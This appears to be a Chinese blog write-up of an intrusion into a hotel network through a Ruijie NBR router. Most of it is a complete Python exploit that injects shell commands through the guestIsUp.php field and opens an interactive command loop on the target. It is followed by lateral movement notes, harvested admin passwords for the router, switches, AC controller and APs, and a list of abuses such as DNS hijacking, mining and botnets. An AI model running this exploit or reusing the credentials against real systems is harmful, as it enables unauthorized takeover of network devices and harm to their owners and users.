酒店网络分析 - 锐捷Exp利用

锐捷漏洞利用

一、目标信息/exp

  • 路由器型号:NBR3000D-E
  • 网关地址:192.168.200.1
  • 开放端口:80,8081
  • 漏洞:远程命令执行
  • exp:
import requests
import sys
import random
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                     \033[0m')
    print('+  \033[34mVersion: 锐捷网络-EWEB网管系统                                      \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url + "/guest_auth/guestIsUp.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    data = "mac=1&ip=127.0.0.1| whoami > PeiQi_test.txt"
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, headers=headers, data=data,verify=False, timeout=5)
        if response.status_code == 200:
            print("\033[32m[o] 目标{}存在漏洞, 执行命令 whoami \033[0m".format(target_url))
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            response = requests.get(url=target_url + "/guest_auth/PeiQi_test.txt", headers=headers, data=data, verify=False, timeout=5)
            print("\033[32m[o] 响应为: {} \033[0m".format(response.text))
            while True:
                cmd = input("\033[35mCmd >>> \033[0m")
                if cmd == "exit":
                    sys.exit(0)
                else:
                    POC_2(target_url, cmd)
        else:
            print("\033[31m[x] 目标不存在漏洞 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

def POC_2(target_url, cmd):
    vuln_url = target_url + "/guest_auth/guestIsUp.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    data = "mac=1&ip=127.0.0.1| {} > PeiQi_test.txt".format(cmd)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, headers=headers, data=data,verify=False, timeout=5)
        if response.status_code == 200:
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            response = requests.get(url=target_url + "/guest_auth/PeiQi_test.txt", headers=headers, data=data,verify=False, timeout=5)
            print("\033[32m[o] 响应为: \n{} \033[0m".format(response.text))
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    POC_1(target_url)

二、内网漫游

  • 执行上面exp得到root权限
  • 进入目录找到日志文件撸到后台密码
  • 网络拓扑
  • 进入后台,找到dhcp服务器配置
    > 核心路由没有划分vlan,只有网段划分,其中200为无线ap wan口网络,ap分配给客户端的ac控制器分配的ip
  • 分析网段划分
    • 总共四个网段,其中两个属于无用网段,有用的只有80网段,里面有两台吧台的PC,剩下的就是200网段,为交换机/AC分配IP
    • 其中80.4为ac控制器 200.1为核心路由器网关地址,除80.4以外80.2-80.14均为锐捷二层交换机

  • 设备汇总
    • 经过分析,内网设备如下
设备名称 设备数量 后台密码
睿易核心路由器 1 ruijie@123.com
睿易二层交换机 12 admin
睿捷AC控制器 1 ruijie@123.com
无线AP 117 admin
PC主机 2

三、报告建议

  • 漏洞危害
    > 不搞事就没有危害,搞事可以做dns劫持/域名跳转,投放广告,挖矿,ddos肉🐔等等,看操作了
  • 修补建议

    换个网管

    更换核心路由器,做测试的时候系统为最新版本,但是依旧攻击成功,说明更换强密码并没有什么卵用,建议更换mikrotik,流控使用三方软路由,或者直接用ros的layer2正则过滤,进行限速或drop处理

    二层交换机全部关闭80/23端口,通过console进行配置,二层交换机本来就不需要经常变动,所有操作全部集中到核心路由器处理

    所有弱密码全部改掉,建议随机密码,一交换机对一密码,所有密码不能重复,最后做excel,丢u盘进保险柜

赞(0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址